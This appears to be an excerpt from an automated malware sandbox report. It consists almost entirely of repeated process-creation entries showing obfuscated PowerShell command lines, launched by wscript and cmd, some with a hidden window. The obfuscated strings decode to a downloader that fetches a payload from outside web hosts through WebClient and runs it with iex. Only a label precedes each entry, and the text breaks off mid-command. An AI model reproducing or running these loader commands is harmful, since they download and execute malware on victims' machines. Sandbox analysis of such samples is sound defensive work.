emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.naJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix 